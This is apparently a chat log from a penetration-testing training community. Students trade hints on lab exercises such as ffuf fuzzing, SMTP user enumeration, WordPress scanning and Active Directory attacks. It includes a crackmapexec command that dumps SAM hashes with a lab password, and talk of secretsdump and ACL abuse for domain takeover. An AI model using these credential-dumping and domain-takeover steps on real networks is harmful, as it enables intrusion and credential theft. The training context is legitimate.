such as using qualifying words like "For Example"
For Example, a server responds in a specific way to a non existent subdomain or page
allows a person to broaden that thought to other ways
as opposed to the definite:
a server responds in a specific way to a non existent subdomain
this may lead the reader to not really think outside the box of the definite meaning you give it
here goes my 10+ hours
Web Fuzzing > Directory and File Fuzzing
Within the "webfuzzing_hidden_path" path on the target system (i.e. http://IP:PORT/webfuzzing_hidden_path/), fuzz for folders and then files to find the flag.
Tried:
ffuf -w /usr/share/seclists/Discovery/Web-Content/* -u http://94.237.49.212:31069/FUZZ
ffuf -w /usr/share/seclists/Discovery/Web-Content/* -u http://94.237.49.212:31069/w2ksvrus/FUZZ
ffuf -w /usr/share/seclists/Discovery/Web-Content/* -u http://94.237.49.212:31069/hidden_fuzzing_path/FUZZ
didn't get any result, got the same endpoint as mentioned in the module
| URL | http://IP:PORT/w2ksvrus/dblclk.html
* FUZZ: dblclk
[Status: 200, Size: 112, Words: 6, Lines: 2, Duration: 0ms]
| URL | http://IP:PORT/w2ksvrus/index.html
* FUZZ: index
Nothing new.
can someone help here?
Like i have tried so many combinations
brain is actually fked
more context is useful for those helping you. (module name, section name, what you have tried, your current understanding, etc.)
done sir
thanks for the guidance.
Did you actually try from the http:ip:port/web_fuzzing_hidden path?
yap it's still running
They literally mean start from that exact directory 
I used the same command as the example (for wordlist and other stuff)
flag right now for me
that's true. Thanks I shall apply that from now on.
In the broken authentication assessment, I found several users, but I only found the password for one of them. For that user and pass, I have tried everything, but I cannot bypass the OTP stage (from brute-force OTP to URI and method manipulation). Is it possible the user for whom I found the password and reached the OTP stage could be incorrect?
In the "Introduction to Threat Hunting & Hunting With Elastic" Skills Assessment, I have been stuck on Hunt 2 for a few hours.
I feel like I have entered every single registry.value into the answer field, based on the KQL queries I made from the hint provided. The corresponding article link provided doesn’t seem to help much either.
Does anyone have any advice or a further clue for Hunt 2?
😉
It seems i'm working with infinity still no results
Hey y'all! I'm in Active Directory Enumeration & Attacks-Initial Enumeration of the Domain.
I SSH'd as instructed, and then ran sudo nmap -A -v -Pn 172.16.x.x. But I'm getting a response saying 0 hosts up.
delete the box
Actually, it's saying (host down). Is there anything I can do?
Huh?
check UDP i guess or try -Pn flag with TCP scan
can someone tell me what's wrong with these commands
||ffuf -w /usr/share/seclists/Discovery/Web-Content/common.txt -u http://94.237.59.199:31136/hidden_fuzzing_path/FUZZ.html -e .php,.html,.txt,.bak,.js
ffuf -w /usr/share/seclists/Discovery/Web-Content/common.txt -u http://94.237.59.199:31136/hidden_fuzzing_path/FUZZ||
The first command u have .html already so u would be adding html.php
Hi, when I try to transfer files in the SAM section of password attacks it denies my access to the share
even if the share is being run with sudo on Linux and CMD prompt is run as admin on Windows
how do I get it to approve?
Does it say something about the administrator?
yes
try making a copy of it.
ok
ok cool
but if the copied file works i don't think the reg changes are required.
but yes can be a way
can try both
I had that error too and the registry worked
Other ways are a lot quicker tho
but section says nothing about registry
Ik
ok. in that case I'll do this the powershell way
That’s not part of the module
but if its not a part of the module and its not in the section why is it a requirement?
just by accident?
i have tried that too didn't work
By removing html?
to make your mind do some exercises?
yes did no result
Possibly but there’s always multiple ways
ok
@safe star check these
Is that actually the name of the path?
the hidden one ?
Yea
I tried it in PS but it won't work
With pyftpdlib and powershell?
I found it instantly @somber fiber
not working for me for some reason
Are u on the directory or page fuzzing?
got only one dir > w2ksvrus for this don't page one
Hi there, I'm working on this module (it's around gobuster, ffuf, whatweb, etc) directory and dns mapping, I found a wordpress, the version of it and it's still on a (setup state) I believe there is a vulnerability there but I can't find the exploit, anyone aware of it ?
Which section?
first one
I was trying to do the module footprinting section "SMTP", but I can't seem to get my script for trying multiple users to work ||for name in $(cat /opt/useful/seclists/Usernames/Names/names.txt); do telnet 10.129.171.248 25; VRFY $name | grep -v '550' | tee -a usernames.txt;done|| this is what I have
Page or directory fuzzing?
page
use smtp-user-enum script
it should be present in the PwnBox
actually I'm pretty sure this is the vulnerability (wordpress is still in setup), but I don't find the CVE nor the exploit, anyone has a tip as to where I can look for it please ?
Hmmm okok, so for this box the idea was to look through the files of the box to find the script?
Or is that an nmap script?
not really tbh. they just wanted us to research on our own
Ohhh I see
no its a standalone binary
Gotta do my research then ahaha
smtp-user-enum Usage Example Use the VRFY method (-M VRFY) to search for the specified user (-u root) on the target server (-t 192.168.1.25):
root@kali:~# smtp-user-enum -M VRFY -u root -t 192.168.1.25 Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum ) ---------------------------------------------------------- | Scan ...
Ty very much for the help
its worth it
pleasure
hi I got to the end where I need to dump the credentials on the target and it's not working even when I copy the exact command and change the IP
btw the stuff @safe star and @somber fiber recommended to previous questions didn't work. I figured out the prior two questions. For this third one please don't tell me to do something that doesn't work. So can someone who knows this one section and what I need to do here please help me. The stuff people recommended the other day worked much better
anyway, I'm on the third question again
Is the VAT percentage standard for all countries in the subscriptions ?
if just by asking and getting answers can make the brain go burrrrrr i'm all in
ok I didn't mean to be a jerk
I probably went a little far. It's just some of the stuff you recommended wasn't even on topic for the section and I tried it and it didn't work.
That said, I think ideally if you have a hint for the third question you can hopefully make up for it
me too, sorry, and learning is a process and it's a field where you do experiments rather than jumping to conclusions.
it worked for me, no problem with the smbserver
ok well, that's fine
is there a way to abuse writedacl from linux? I don't think powerview is actually making the changes when i use Add-DomainObjectAcl
did u run the impacket smbserver just like it said?
yes
but I had a couple minor things wrong
but I got the SMB server running
I'm on question 3. the files have been moved
I got first two flags already
Academy's File Inclusion Box is either really hard or my notes are really bad
Anyone who has solved it?
did u use secrets dump
yes
it should be at the bottom
ok
here's the command I use:
┌─[us-academy-1]─[10.10.14.143]─[htb-ac-605555@htb-dvdmy7b9tc]─[~]
└──╼ [★]$ crackmapexec smb 10.129.42.198 --local-auth -u bob -p HTB_@cademy_stdnt! --sam
I think there's something off about the command
hold on let me change IP address
the secretsdump gave a password for an unknown user
u can assume what user that belongs to
crackmapexec also shows the user and password
u didn't use --lsa
Also wrap the password in single quotes
thought the discord code block removed them
I did and it gave a blank command line output
so command processed but where do I get output?
what folder is the output in?
Nope ' '
I have had multiple outputs like this
it should have output and write to a folder
Well nxc tells you where it's writing to
I believe it's in /tmp/ by default but idk enough about cme to say
it says ~/.cme/logs on my screen
but you should have output on your screen
can you ping the machine?
could someone give me a hand with using crackmapexec in the skills assessment
Use nxc to finish the assessment 
whats nxc?
Netexec
It's literally crackmapexec but better
Due to a disagreement the people actually maintaining and updating the code forked to their own thing
alright
But the syntax largely remains the same
well i'm having issues with the first question. i'm pretty sure you're supposed to use a null session and rid-brute but that's not working
Haven't done that module so I can't tell ya
I was more so joking that you gave so little info that it makes it hard to actually help
anybody able to help out with the "Web Enumeration" module please ? I'm stuck on a technicality x)
Sure let me read your mind real quick to get your actual question
Sorry my psychic powers are still out
Wait, they don’t use nxc in the module?
It was written before nxc
Oh
So I have been poking at this exercise, I found a /wordpress and it is a wordpress in install mode (still not installed) I'm pretty sure there is something to do with it, but I can't find any exploit online
I haven't done the module so can't tell ya
I'm sure the section gives you tools you can use
Also there's no "web enumeration" module
yes it is to use gobuster then it says that there is RCE on a non-installed wordpress install page, but there is nothing else, been poking at it for couple hours now 💀
At least that's not the title
It’s the getting started module
🤔 I don't recall needing to do anything crazy
Just looking at the source a lot
And robots
No bruteforcing or any tools really used
humm maybe it's simpler than what I'm trying then, I fuzzed it to find the wordpress, then fuzzed the /wordpress itself am I missing something ?
Also gobuster likely wouldn't have found anything useful
Are you looking at inlanefreight.com?
Because that's not the target
no no I'm looking at my ip target
sure I'll keep checking, just knowing I don't need to be looking at CVEs is already a great help!
got it, I'll have another stab at it, thanks
If it seems needlessly complex do something else
ok so this is crazy, the common.txt I was using did not have what I needed, logged in through vpn with a fresh kali and had it all just with the common.txt list x)
this was very helpful cause I just cat and grep the file and that's what showed me that my list sucked
bruteforcing was not required
:)
check the source code of the login 😉
Yup once I got the robot, it was all smooth sailing, cheers! I
you didn't need to even fuzz for it dude
when adding something to etc/hosts for HTB do i put something like gettingstarted.htb or gettingstarted.com
it's a common enough thing that you should always look for it off rip
.htb usually
generally a vhost for htb machines will take the form of .htb or .local if it's 100% required
true, it is basic for indexing, could've just typed it in the url without using any tool x)
yes they got me good with this part in the same section
||visiting http://10.10.10.121/wordpress in a browser reveals that WordPress is still in setup mode, which will allow us to gain remote code execution (RCE) on the server.||
because that's just an example
break away from the thought that the examples will always 100% be what you encounter unless it's explicitly mentioned
like for the upcoming nibbles sections
think of it as broad tooling
I have GenericAll over a container that has the domain administrator in it, I also have GenericAll over the DC. I'm having trouble understanding how to use ACLs to take over the domain from this point. Can anyone help?
what academy module is this for?
hi everyone! I'm at Skills Assessment - WordPress and I'm using wpscan with --enumerate ap to adjust the scanning towards the plugins, but the thing is it doesn't show anything about the vulnerabilities of the plugins found (when the module says that is in the output of the scan)
Anyone knows why?
hey everyone,
I'm on the linux fundamentals and have a question:
The questions posed at the end of the section is:
"What is the name of the config file that has been created after 2020-03-03 and is smaller than 28k but larger than 25k?"
I used the "find" command to locate the file but it's saying that it's wrong and when I attempt to click the "show solution" button nothing happens.
any help would be appreciated
Here is what I believe the proper name of the config file is:
/usr/share/drirc.d/
Shows just the version and stuff but nothing about vulns
[!] No WPScan API token given, as a result vulnerability data has not been output.
Your answer is literally in the screen shot, did you read it? it says no API token was given so it's not showing vuln output.
Yeah I read it but an API Token is not necessary in this assessment but HTB tells you that in the output you will find information about plugins vulns
i haven't done that module but i'd assume it's not necessary because you can manually enumerate it. if you want vuln output from wpscan you're going to need an API.
Oh I see...
yeah
also as your output states you can get a free API token
good for 25 host scans per day:D
Yeah, it's good to know xD
it was likely touched on in the module btw
i doubt they'd talk about the tool without telling you an important bit of info about it
It was touched on in a command (with API token btw) but just as an example of how the vuln looks in the output, not how to search for and use an API key 😅
its in WPScan Enumeration section
pretty sure it's the exact same but with like an --api argument or something
Anybody here know how to find the flag in nmap service enumeration ?
Windows File Transfer Methods 1st question can anyone give me hint
like how to get shell in the windows machine is that part of the question or?
--api-token
wpscan -h 😉
you ask it nicely
I got the flag from http/ip/robots.txt , but it's showing wrong answer
try scanning the services
that should be the right flag if i recall
wait nvm
it's something else
enumerate the services
the hint refers to nmap not always being able to recognize everything
perhaps look for something out of place in your scan and utilize a tool like nc to grab the banner
Ok let me try
you can find it with nmap alone by using the commands shown in the section
I already got the flag but wrong answer